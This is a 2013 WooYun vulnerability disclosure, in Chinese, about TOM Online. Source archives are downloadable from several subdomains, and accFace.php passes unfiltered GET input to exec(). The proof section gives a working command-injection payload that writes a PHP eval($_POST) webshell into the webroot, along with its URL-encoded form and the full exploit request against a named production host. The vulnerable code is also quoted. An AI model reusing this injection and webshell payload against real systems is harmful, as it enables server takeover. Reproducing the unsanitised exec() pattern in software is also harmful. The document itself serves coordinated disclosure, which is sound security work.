当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-046823

漏洞标题:TOM在线某运维缺陷导致任意命令执行

相关厂商:TOM在线

漏洞作者: felixk3y

提交时间:2013-12-23 17:49

修复时间:2014-02-06 17:50

公开时间:2014-02-06 17:50

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-23: 细节已通知厂商并且等待厂商处理中
2013-12-24: 厂商已经确认,细节仅向厂商公开
2014-01-03: 细节向核心白帽子及相关领域专家公开
2014-01-13: 细节向普通白帽子公开
2014-01-23: 细节向实习白帽子公开
2014-02-06: 细节向公众公开

简要描述:

对Tom在线的运维缺陷加以利用直接导致命令执行

详细说明:

@xsser 刚才发的那个TOM任意文件上传,我知道是已经提交过的,但厂商没有修复,麻烦再通知下厂商,谢谢.
对这个漏洞我真不想说什么了,运维的、写代码真的应该好好给他们洗洗脑...
#1 好多个网站的源代码任意下载

http://post.news.tom.com/post.tar.gz
http://post.tom.com/post.tar.gz
http://post.weiqi.tom.com/post.tar.gz
http://post.auto.tom.com/post.tar.gz
http://post.she.tom.com/post.tar.gz


应该还没列完,好好检查下。
#2 解压post.tar.gz

C:\Users\Administrator\Desktop\code 的目录
2013/12/23 17:07 <DIR> .
2013/12/23 17:07 <DIR> ..
2013/12/23 16:02 <DIR> .svn
2013/12/23 16:02 <DIR> ajax
2013/12/23 16:02 <DIR> cache
2013/12/23 16:03 <DIR> channel
2013/12/23 16:02 <DIR> class
2013/12/23 16:02 <DIR> cmslog
2013/12/23 16:02 <DIR> cmslog2
2013/12/23 16:02 <DIR> cmslog3
2013/12/23 16:02 <DIR> config
2013/12/23 16:02 <DIR> cron
2013/12/23 16:02 <DIR> dyp
2013/12/23 16:03 <DIR> functions
2013/12/23 16:02 <DIR> help
2013/12/23 16:03 <DIR> images
2013/12/23 16:03 <DIR> img_tmp
2013/12/23 16:03 <DIR> include
2013/12/23 16:02 <DIR> index
2013/12/23 16:02 <DIR> infchannel
2013/12/23 16:03 <DIR> interface
2013/12/23 16:02 <DIR> lib
2013/12/23 16:02 <DIR> log
2013/12/23 16:02 <DIR> post
2013/12/23 16:02 <DIR> qa
2013/12/23 16:02 <DIR> related_news_cache
2013/12/23 16:03 <DIR> script
2013/12/23 16:02 <DIR> shell
2013/12/23 16:02 <DIR> style
2013/12/23 16:02 <DIR> template
2013/12/23 16:02 <DIR> test
2013/12/23 16:03 <DIR> testjs
2013/12/23 16:02 <DIR> tmp
2013/12/23 16:03 <DIR> userface
2011/08/01 15:56 12,288 .鏂板崕缃_0110614-20110615_.txt.swp
2009/03/25 17:17 79,215 4A000A95112.html
2011/06/24 13:36 15,583 778DV6L3.html
2010/08/04 14:28 0 a.txt
2009/03/25 17:16 623 aa.html
2009/03/25 17:16 280 aa.php
2013/12/23 17:09 2,145 accFace.php
2009/03/25 17:16 52,383 ag.php
2011/06/24 17:44 71,786 article_gallery_special.php
2011/07/12 13:22 71,085 article_gallery_special2011bai.php
2010/04/22 18:13 65,989 article_gallery_special_t.php
2010/09/16 10:59 69,760 article_gallery_v2.php
2009/03/25 17:17 57,872 article_gallery_v2_t.php
2011/06/25 11:09 73,872 article_special.php
2011/01/05 16:51 72,558 article_special2.php
2011/07/27 14:56 73,943 article_special20110726.php
2011/07/21 18:52 75,839 article_special2011bai.php
2011/07/21 18:21 75,839 article_special2011bai1.php
2011/01/28 11:07 73,794 article_special3.php
2011/06/24 14:19 74,136 article_special4.php
2009/08/14 11:09 73,268 article_special_test.php
2009/03/25 17:17 57,659 article_t.php
2009/03/25 17:17 85,644 article_v3.html
2009/03/25 17:17 56,547 article_v3_20090120_wd_bak.php
2010/09/17 17:03 70,262 article_v5.php
2009/09/28 14:30 66,067 article_v5_t.php
2010/07/27 13:00 89 asx.php
2011/03/02 17:26 867 auto_delete_nandu.php
2011/02/25 17:33 134 auto_delete_nandu.sh
2010/06/29 10:24 0 b
2009/08/20 17:00 1,553 batchcomment.php
2009/03/25 17:17 4,169 bot.php
2009/03/25 17:16 3,046 cn.php
2009/08/10 09:13 30,870 comment.php
2009/03/25 17:16 10,297 common.functions.php
2010/06/03 15:32 11,191 del.txt
2010/08/03 11:19 27,222 delete
2011/08/30 15:47 2,299,080 deleteSucc.log
2011/02/24 17:34 38 deletetmp.txt
2009/03/25 17:16 3,737 doCatalog.php
2009/03/25 17:17 1,364 doDeleteArticle.php
2009/03/25 17:16 999 doLogin.test.php
2009/03/25 17:16 1,421 doRegister.php
2009/03/25 17:17 3,938 doUpdateUser.php
2009/09/03 12:08 3,665 doUploadArticleImg.php
2010/04/22 11:01 3,636 doUploadImage.php
2009/09/03 13:11 3,740 duai.php
2010/06/07 15:18 19 env.php
2009/03/25 17:16 1,150 favicon.ico
2011/08/04 09:56 752 fazhi20110804.txt
2009/03/25 17:17 1,477 foreign.php
2009/03/25 17:16 22,414 g.php
2009/08/18 11:26 18,654 gallery.php
2009/07/06 17:29 24,891 gallery_bak.php
2009/07/09 14:21 18,660 gallery_t.php
2010/03/30 10:11 271 gettangyuan.php
2009/11/20 17:08 2,806 HanroadClass.php
2009/07/08 15:54 1,435 hwbang.php
2009/03/25 17:16 584 hwrec.php
2009/07/08 15:54 1,487 hwtag.php
2009/03/25 17:17 1,111 hyperwords.php
2009/07/24 17:57 2,362 index.html
2011/08/30 13:00 13,037 index.php
2009/03/25 17:17 12,757 index1.html
2009/03/25 17:16 311 indexStat.php
2009/07/06 18:46 61,822 index_voice.php
2009/07/06 18:23 61,494 index_voice_bak.php
2009/03/25 17:16 25 ip.php
2010/07/07 15:28 1,245 j
2010/07/07 15:30 10,588 j1
2010/07/07 15:25 36,553 jhsblynew
2010/07/07 15:25 8,172 jhsbzwnew
2009/03/25 17:17 730 link.php
2009/06/01 20:27 523 log.php
2009/07/24 17:53 2,926 login.php
2009/03/25 17:17 693 logout.php
2010/11/03 16:52 3,114 main.inc.php
2009/03/25 17:16 1,807 manageArticle.php
2009/03/25 17:16 1,059 manageArticleByCatalog.php
2009/03/25 17:17 667 manageCatalog.php
2009/03/25 17:17 630 manageUser.php
2009/03/25 17:17 597 modify_list
2009/03/25 17:17 428 msg.html
2011/02/24 18:19 24,599 nandu_end.txt
2011/02/28 15:47 191 nandu_end2011-02-28.txt
2011/03/30 15:47 152 nandu_end2011-03-30.txt
2011/03/31 15:47 152 nandu_end2011-03-31.txt
2011/04/30 15:47 86 nandu_end2011-04-30.txt
2011/05/30 15:47 154 nandu_end2011-05-30.txt
2011/05/31 15:47 154 nandu_end2011-05-31.txt
2011/06/01 15:47 0 nandu_end2011-06-01.txt
2011/06/02 15:47 13 nandu_end2011-06-02.txt
2011/06/03 15:47 13 nandu_end2011-06-03.txt
2011/06/04 15:47 13 nandu_end2011-06-04.txt
2011/06/05 15:47 13 nandu_end2011-06-05.txt
2011/06/06 15:47 13 nandu_end2011-06-06.txt
2011/06/07 15:47 13 nandu_end2011-06-07.txt
2011/06/08 15:47 13 nandu_end2011-06-08.txt
2011/06/09 15:47 13 nandu_end2011-06-09.txt
2011/06/10 15:47 26 nandu_end2011-06-10.txt
2011/06/11 15:47 26 nandu_end2011-06-11.txt
2011/06/12 15:47 26 nandu_end2011-06-12.txt
2011/06/13 15:47 39 nandu_end2011-06-13.txt
2011/06/14 15:47 39 nandu_end2011-06-14.txt
2011/06/15 15:47 52 nandu_end2011-06-15.txt
2011/06/16 15:47 65 nandu_end2011-06-16.txt
2011/06/17 15:47 78 nandu_end2011-06-17.txt
2011/06/18 15:47 78 nandu_end2011-06-18.txt
2011/06/19 15:47 78 nandu_end2011-06-19.txt
2011/06/20 15:47 91 nandu_end2011-06-20.txt
2011/06/21 15:47 91 nandu_end2011-06-21.txt
2011/06/22 15:47 91 nandu_end2011-06-22.txt
2011/06/23 15:47 91 nandu_end2011-06-23.txt
2011/06/24 15:47 91 nandu_end2011-06-24.txt
2011/06/25 15:47 91 nandu_end2011-06-25.txt
2011/06/26 15:47 91 nandu_end2011-06-26.txt
2011/06/27 15:47 116 nandu_end2011-06-27.txt
2011/06/28 15:47 116 nandu_end2011-06-28.txt
2011/06/29 15:47 116 nandu_end2011-06-29.txt
2011/06/30 15:47 116 nandu_end2011-06-30.txt
2011/07/01 15:47 13 nandu_end2011-07-01.txt
2011/07/02 15:47 26 nandu_end2011-07-02.txt
2011/07/03 15:47 26 nandu_end2011-07-03.txt
2011/07/04 15:47 50 nandu_end2011-07-04.txt
2011/07/05 15:47 50 nandu_end2011-07-05.txt
2011/07/06 15:47 86 nandu_end2011-07-06.txt
2011/07/07 15:47 86 nandu_end2011-07-07.txt
2011/07/08 15:47 110 nandu_end2011-07-08.txt
2011/07/09 15:47 110 nandu_end2011-07-09.txt
2011/07/10 15:47 110 nandu_end2011-07-10.txt
2011/07/11 15:47 110 nandu_end2011-07-11.txt
2011/07/12 15:47 110 nandu_end2011-07-12.txt
2011/07/13 15:47 110 nandu_end2011-07-13.txt
2011/07/14 15:47 110 nandu_end2011-07-14.txt
2011/07/15 15:47 110 nandu_end2011-07-15.txt
2011/07/16 15:47 110 nandu_end2011-07-16.txt
2011/07/17 15:47 110 nandu_end2011-07-17.txt
2011/07/18 15:47 110 nandu_end2011-07-18.txt
2011/07/19 15:47 110 nandu_end2011-07-19.txt
2011/07/20 15:47 110 nandu_end2011-07-20.txt
2011/07/21 15:47 110 nandu_end2011-07-21.txt
2011/07/22 15:47 110 nandu_end2011-07-22.txt
2011/07/23 15:47 110 nandu_end2011-07-23.txt
2011/07/24 15:47 110 nandu_end2011-07-24.txt
2011/07/25 15:47 110 nandu_end2011-07-25.txt
2011/07/26 15:47 121 nandu_end2011-07-26.txt
2011/07/27 15:47 146 nandu_end2011-07-27.txt
2011/07/28 15:47 159 nandu_end2011-07-28.txt
2011/07/29 15:47 159 nandu_end2011-07-29.txt
2011/07/30 15:47 159 nandu_end2011-07-30.txt
2011/07/31 15:47 159 nandu_end2011-07-31.txt
2011/08/01 15:47 0 nandu_end2011-08-01.txt
2011/08/02 15:47 0 nandu_end2011-08-02.txt
2011/08/03 15:47 0 nandu_end2011-08-03.txt
2011/08/04 15:47 0 nandu_end2011-08-04.txt
2011/08/05 15:47 0 nandu_end2011-08-05.txt
2011/08/06 15:47 0 nandu_end2011-08-06.txt
2011/08/07 15:47 0 nandu_end2011-08-07.txt
2011/08/08 15:47 0 nandu_end2011-08-08.txt
2011/08/09 15:47 12 nandu_end2011-08-09.txt
2011/08/10 15:47 12 nandu_end2011-08-10.txt
2011/08/11 15:47 12 nandu_end2011-08-11.txt
2011/08/12 15:47 12 nandu_end2011-08-12.txt
2011/08/13 15:47 12 nandu_end2011-08-13.txt
2011/08/14 15:47 12 nandu_end2011-08-14.txt
2011/08/15 15:47 12 nandu_end2011-08-15.txt
2011/08/16 15:47 12 nandu_end2011-08-16.txt
2011/08/17 15:47 25 nandu_end2011-08-17.txt
2011/08/18 15:47 25 nandu_end2011-08-18.txt
2011/08/19 15:47 25 nandu_end2011-08-19.txt
2011/08/20 15:47 25 nandu_end2011-08-20.txt
2011/08/21 15:47 25 nandu_end2011-08-21.txt
2011/08/22 15:47 25 nandu_end2011-08-22.txt
2011/08/23 15:47 38 nandu_end2011-08-23.txt
2011/08/24 15:47 38 nandu_end2011-08-24.txt
2011/08/25 15:47 50 nandu_end2011-08-25.txt
2011/08/26 15:47 63 nandu_end2011-08-26.txt
2011/08/27 15:47 63 nandu_end2011-08-27.txt
2011/08/28 15:47 63 nandu_end2011-08-28.txt
2011/08/29 15:47 63 nandu_end2011-08-29.txt
2011/08/30 15:47 63 nandu_end2011-08-30.txt
2011/01/19 16:49 8,336 nandu_new.txt
2011/02/25 16:37 24 nandu_new1.txt
2011/02/24 18:10 26,631 nandu_trans.txt
2010/06/28 14:53 611 ndylzkbak
2010/06/28 14:53 579 ndzkbak
2009/04/08 18:18 201 new
2009/04/02 15:42 850 new.php
2009/03/25 17:16 46,029 newsearch.php
2009/09/04 10:20 1,272 NewsEdit.html
2009/03/25 17:17 46,415 ourgame.php
2009/06/16 15:39 64,022 ourgame_gallery.php
2009/06/15 13:15 66,174 ourgame_v2.php
2009/05/31 10:54 18,343 out.txt
2009/03/25 17:16 3,186 pass_indexlogin.js
2009/03/25 17:17 4,262 pdnav.js
2009/03/25 17:17 614 pfprt.php
2009/03/25 17:17 31,233 pn.php
2009/07/09 17:33 3,891 PostCollector.php
2009/08/01 17:28 6,284 PPCache.php
2009/11/03 16:56 28,937 publish_news.php
2010/06/07 16:11 29,522 publish_news_t.php
2009/04/08 16:54 34,624 publish_news_v2.php
2011/04/06 17:49 180,587 qingnianbao_res.txt
2011/04/08 08:56 59,768 qingnianbao_res1.txt
2009/03/25 17:16 2,169 redirect.php
2009/03/25 17:17 2,174 redirect8.php
2009/03/25 17:16 2,209 redirect8_test.php
2009/03/25 17:17 813 register.php
2010/05/28 19:48 3,131 renming
2009/03/25 17:16 21,551 scriptt
2009/03/25 17:17 673 search.php
2009/03/25 17:17 685 searchUtf8.php
2011/05/12 10:08 577 Search_agent.html
2009/03/25 17:16 54 sitemap.html
2009/03/25 17:16 138,275 sk.html
2009/03/25 17:16 304,774 sk.js
2009/03/25 17:17 304,799 sk1.js
2011/01/28 12:06 1,510 snooker_weibo.html
2009/03/25 17:16 77,809 sport_vote_1.html
2009/03/25 17:17 1,181 status.php
2009/03/25 17:17 91,784 t.html
2009/04/13 13:17 65,423 t.php
2009/08/26 15:38 209 t0.php
2009/04/15 14:15 2,604 t1.php
2009/03/25 17:17 842 t2.php
2009/08/28 15:52 6,275 tag.php
2009/08/28 15:51 6,088 tag1.php
2009/08/28 15:47 6,147 tag20080320.php
2009/03/25 17:17 4,187 tag_list_comments.php
2009/03/25 17:16 4,488 tag_list_digs.php
2009/03/25 17:16 4,212 tag_list_tramples.php
2009/03/25 17:17 109,674 test.html
2011/08/04 10:08 455 test.php
2010/05/28 20:02 2,747 test.txt
2011/07/18 17:47 147 test2.php
2010/06/03 15:40 2,917 test2.txt
2009/03/25 17:17 388 test_article_list.php
2011/06/28 10:24 373 test_cao.php
2009/08/04 18:00 4,848 test_cms.html
2009/03/25 17:16 4,078 top.php
2009/03/25 17:17 4,053 top1h.php
2009/06/29 10:24 6,853 TPPClient.php
2009/04/09 16:29 159 trip.php
2009/03/25 17:16 832 tt.html
2009/04/10 11:39 1,169 tt.php
2009/03/25 17:16 2,771 uai.php
2009/09/03 11:55 2,683 uai_t.php
2009/09/08 10:58 932 update.php
2009/08/28 10:48 1,335 updatesmall.php
2009/09/03 13:25 2,476 uploadArticleImg.php
2009/09/22 09:45 4,832 user.php
2009/11/03 14:42 4,509 userInfo.php
2009/03/25 17:16 757 vimrc
2010/10/15 14:20 39 wcf
2010/10/13 10:41 477 wcf.php
2010/10/15 14:21 39 wcfanother
2010/10/15 14:22 39 wcfanother11
2010/10/15 14:20 39 wcfdefault
2009/03/25 17:16 57,881 weekend.php
2009/03/25 17:16 1,002 weekend_x.php
2011/06/15 11:27 81 xinhua20110614-20110615.txt
2011/06/15 11:20 84 xinhua20110614-20110615_.txt
2011/06/28 10:22 2,883 xinhua20110616-0628_new.txt
2011/06/28 15:48 2,663 xinhua20110616-0628_new_res.txt
2011/06/28 09:54 5,594 xinhua20110616.txt
2011/06/28 10:00 16,073 xinhua20110616_res.txt
2010/08/03 20:02 307 zgxwzk
2011/07/08 14:49 73,872 拷贝于 article_special.php
2011/06/15 11:20 84 鏂板崕缃_0110614-20110615_.txt

漏洞证明:

#3 对下载的代码进行简单审计
根目录下的accFace.php文件

<?php
//...
$faceName = urldecode(trim($_GET['faceName']));
$tmpPath = urldecode(trim($_GET['tmpPath']));
if (get_magic_quotes_gpc()) {
$faceName = stripslashes($faceName);
$tmpPath = stripslashes($tmpPath);
$localPath = stripslashes($localPath);
}
$subPath = $FACE_LOCAL_PATH.preg_replace('/\\/[^\\/]+?\\w$/i', '', $faceName);
if (!file_exists($subPath)) {
@exec("mkdir -p $subPath");
}
$commandDesc = "wget -O $FACE_LOCAL_PATH$faceName $tmpPath$faceName";
exec($commandDesc);
//生成缩略图
resizeImage($FACE_LOCAL_PATH.$faceName, $FACE_LOCAL_PATH.str_replace('.', '_s.', $faceName), $RESIZE_WIDTH, $RESIZE_HEIGHT);
?>


65-67行:

if (!file_exists($subPath)) {
@exec("mkdir -p $subPath");//一看就知道是C程序员写的, exec啊,其实吧,php有相应函数的....
}


$subPath没过滤,导致任意命令执行...
#4 利用吧
直接访问accFace.php爆出绝对路径,好吧 那我们就写个shell进去...

1.jpg


我们构造faceName参数为:

aa || echo '<?php eval($_POST[#]);?>It works' >/data/webroot/post/tom.php


Encode 下:

aa%20%7C%7C%20echo%20'<%3Fphp%20eval(%24_POST%5Bcmd%5D)%3B%3F>It%20works'%20>%2Fdata%2Fwebroot%2Fpost%2Ftom.php


GET提交:

http://post.news.tom.com/accFace.php?faceName=aa%20%7C%7C%20echo%20'%3C%3Fphp%20eval(%24_POST%5Bcmd%5D)%3B%3F%3EIt%20works'%20%3E%2Fdata%2Fwebroot%2Fpost%2Ftom.php&tmpPath=1&localPath=1


命令执行了,在根目录下生产tom.php

2.jpg


#5 shell show

3.jpg

修复方案:

备份文件删或改,代码好好检查下.哈哈 帮你们找到个那么严重的漏洞,有礼物否...

版权声明:转载请注明来源 felixk3y@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2013-12-24 10:58

厂商回复:

非常感谢您对TOM在线的帮助,我们会尽快做出处理。我们为支持TOM在线的发布者创建了一个技术交流QQ群:328442670,希望您以及更多的成员加入,大家共同交流。同时TOM在线在通过公司申请后会不定期发送礼品给发布者,以表您对TOM在线的支持。

最新状态:

暂无


漏洞评价:

评论

  1. 2013-12-23 17:53 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    闪电闪电闪电!

  2. 2013-12-23 17:57 | hacker@sina.cn ( 普通白帽子 | Rank:288 漏洞数:27 | ANONYMOUS)

    来膜拜一下

  3. 2013-12-23 18:05 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1545 漏洞数:260 | ...........................................)

    肯定是利用的方式是创新的

  4. 2013-12-23 19:06 | BadCat ( 实习白帽子 | Rank:81 漏洞数:21 | 悲剧的我什么都不会)

    闪电呀!!

  5. 2013-12-23 20:47 | 233 ( 路人 | Rank:14 漏洞数:4 | 小孩子看了根本把持不住)

    啪!

  6. 2013-12-24 11:09 | felixk3y ( 普通白帽子 | Rank:523 漏洞数:41 | php python jsp)

    @TOM在线 才给13rank,看来你们对安全的理解确实不怎么的啊.

  7. 2013-12-24 13:47 | 子墨 ( 普通白帽子 | Rank:194 漏洞数:22 | 天地不仁,以万物为刍狗;圣人不仁,以百姓为...)

    TOM在线的评分好像是挺随意的

  8. 2014-01-13 14:20 | also ( 普通白帽子 | Rank:424 漏洞数:52 | 招渗透/php/前端/ios&android安全,广州地...)

    呵呵呵,终于被爆出来了

  9. 2014-01-13 14:25 | Mr.leo ( 普通白帽子 | Rank:1314 漏洞数:176 | 说点神马呢!!)

    mark

  10. 2014-01-13 14:32 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1545 漏洞数:260 | ...........................................)

    @Mr.leo 分低了点看不到细节。。。

  11. 2014-01-13 14:34 | Mr.leo ( 普通白帽子 | Rank:1314 漏洞数:176 | 说点神马呢!!)

    @HackBraid 换大号哈

  12. 2014-01-13 15:23 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | 一切语言转汇编理论)

    @HackBraid 看到细节了,可以问我

  13. 2014-01-13 16:12 | hacker@sina.cn ( 普通白帽子 | Rank:288 漏洞数:27 | ANONYMOUS)

    果然是源码分析的 呵呵呵呵 , 搞源码备份的太该死了。

  14. 2014-01-13 17:13 | lucky ( 普通白帽子 | Rank:409 漏洞数:84 | 三人行必有我师焉########################...)

    不错!挺详细的!很好的教学呀!

  15. 2014-02-06 19:44 | IXY ( 路人 | Rank:19 漏洞数:3 | 小菜来学习的)

    很详细 学习了

  16. 2014-02-08 18:38 | Jeremy ( 普通白帽子 | Rank:106 漏洞数:11 | )

    mark